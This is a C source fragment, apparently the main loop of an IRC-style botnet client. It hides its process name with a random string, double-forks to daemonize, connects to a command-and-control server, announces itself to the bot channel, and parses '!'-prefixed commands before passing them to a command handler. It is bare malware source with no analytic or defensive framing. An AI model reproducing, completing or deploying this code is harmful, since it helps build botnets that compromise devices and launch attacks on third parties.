name_buf_len = ((rand_next() % 6) + 3) * 4; rand_alphastr(name_buf, name_buf_len); name_buf[name_buf_len] = 0; prctl(PR_SET_NAME, name_buf); srand(time(NULL) ^ getpid()); rand_init(); pid_t pid1; pid_t pid2; int status; getOurIP(); if (pid1 = fork()) { waitpid(pid1, &status, 0); exit(0); } else if (!pid1) { if (pid2 = fork()) { exit(0); } else if (!pid2) { } else { } } else { } chdir("/"); signal(SIGPIPE, SIG_IGN); while(1) { if(initConnection()) { continue; } botnetPrint(KadenCommStock, "\e[96m[%s] \e[97mConnected -> %s -> %s",getBuildz(), inet_ntoa(ourIP), getBuild(), getEndianness(), VERSION); char commBuf[4096]; int got = 0; int i = 0; while((got = recvLine(KadenCommStock, commBuf, 4096)) != -1) { for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) { unsigned int *newpids, on; for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on]; pids[on - 1] = 0; numpids--; newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int)); for (on = 0; on < numpids; on++) newpids[on] = pids[on]; free(pids); pids = newpids; } commBuf[got] = 0x00; trim(commBuf); unsigned char *message = commBuf; if(*message == '!') { unsigned char *nickMask = message + 1; while(*nickMask != ' ' && *nickMask != 0x00) nickMask++; if(*nickMask == 0x00) continue; *(nickMask) = 0x00; nickMask = message + 1; message = message + strlen(nickMask) + 2; while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00; unsigned char *command = message; while(*message != ' ' && *message != 0x00) message++; *message = 0x00; message++; unsigned char *tmpcommand = command; while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; } unsigned char *params[10]; int paramsCount = 1; unsigned char *pch = strtok(message, " "); params[0] = command; while(pch) { if(*pch != '\n') { params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1); memset(params[paramsCount], 0, strlen(pch) + 1); strcpy(params[paramsCount], pch); paramsCount++; } pch = strtok(NULL, " "); } processCmd(paramsCount, params); if(paramsCount > 1) { int q = 1; for(q = 1; q < paramsCount; q++) { free(params[q]); } } } } } return 0; }